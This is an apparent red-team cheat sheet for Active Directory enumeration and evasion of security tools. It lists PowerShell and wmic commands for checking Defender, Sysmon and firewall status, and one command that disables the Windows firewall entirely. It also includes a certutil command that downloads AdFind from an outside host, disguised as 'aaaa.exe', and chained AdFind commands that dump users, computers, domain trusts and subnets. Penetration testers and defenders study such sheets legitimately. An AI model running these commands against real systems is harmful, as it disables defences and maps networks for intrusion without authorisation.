Active Directory

Active Directory Objects: Users: A security principal that is allowed to authenticate to machines in the domain Computers: A special type of user accounts GPOs: Collections of policies that are applied to other AD objects

$ systeminfo | findstr Domain ... to check if host is part of a domain

$ Get-ADUser -Filter * ... gets all AD User accounts

$ Get-ADUser -Filter * -SearchBase "CN=Users,DC=THMREDTEAM,DC=COM" ... to specific the Common-Name (CN)

Security Evasion: $ wmic /namespace:\root\securitycenter2 path antivirusproduct ... to check installed security product

$ Get-Service WinDefend ... to check Defender status

$ Get-MpComputerStatus | select RealTimeProtectionEnabled ... to check Defender real-time scan status

$ Get-NetFirewallProfile | Format-Table Name, Enabled ... to check Windows firewall status

$ Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False ... to disable firewall

$ Get-NetFirewallRule | select DisplayName, Enabled, Description ... to check all firewall settings

$ Test-NetConnection -ComputerName 127.0.0.1 -Port 80 ... to test connections through firewall

$ Get-MpThreat ... to check latest Defender detections

$ Get-EventLog -List ... to list all event log categories to enumerate what is running on the host

$ Get-Process | Where-Object { $_.ProcessName -eq "Sysmon" } ... to check if sysmon is running (extended logging)

$ wmic product get name,version ... to enumerate installed software

$ Get-ChildItem -Hidden -Path C:\Users\kkidd\Desktop ... to find hidden files/directories

$ wmic qfe get Caption,Description ... to check installed upates

EDR Enumeration Tools: https://github.com/PwnDexter/Invoke-EDRChecker https://github.com/PwnDexter/SharpEDRChecker

AD Objects: Users Services Machines (Computername$) Security Groups OU = Apply policies Security Groups = grant permissions

ADFind

Download

cmd.exe /c certutil.exe -urlcache -split -f http://vmoshpit.com/tools/AdFind.exe C:\Users\Public\aaaa.exe

Examples

adfind.exe -f "(objectcategory=person)" > ad_users.txt adfind.exe -f "objectcategeroy=computer" > ad_computers.txt adfind.exe -sc trustdump > ad_trustdump.txt adfind.exe -subnets -f (objectCategory=subnet) > subnets.txt

Usage

aaaa.exe -f "(objectcategory=person)" > C:\tmp\ad_users.txt aaaa.exe -f "objectcategeroy=computer" > C:\tmp\ad_computers.txt aaaa.exe -sc trustdump > C:\tmp\ad_trustdump.txt aaaa.exe -subnets -f (objectCategory=subnet) > C:\tmp\ad_subnets.txt

Scripted

aaaa.exe -f "(objectcategory=person)" > C:\tmp\ad_users.txt && aaaa.exe -f "objectcategeroy=computer" > C:\tmp\ad_computers.txt && aaaa.exe -sc trustdump > C:\tmp\ad_trustdump.txt && aaaa.exe -subnets -f (objectCategory=subnet) > C:\tmp\ad_subnets.txt

PreviousShodan NextPowershell